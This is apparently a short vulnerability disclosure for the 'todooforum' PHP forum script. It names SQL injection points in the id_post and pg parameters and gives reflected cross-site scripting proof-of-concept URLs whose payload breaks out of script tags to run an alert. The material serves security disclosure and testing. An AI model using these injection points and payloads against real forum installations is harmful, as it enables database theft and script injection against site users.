[+] SQL Injection

[+] Parameter : id_post

[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1

[+] Parameter : pg

[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]

[+] Cross-site scripting

[+] Parameter : id_post

[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1 

[+] Parameter : pg

[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>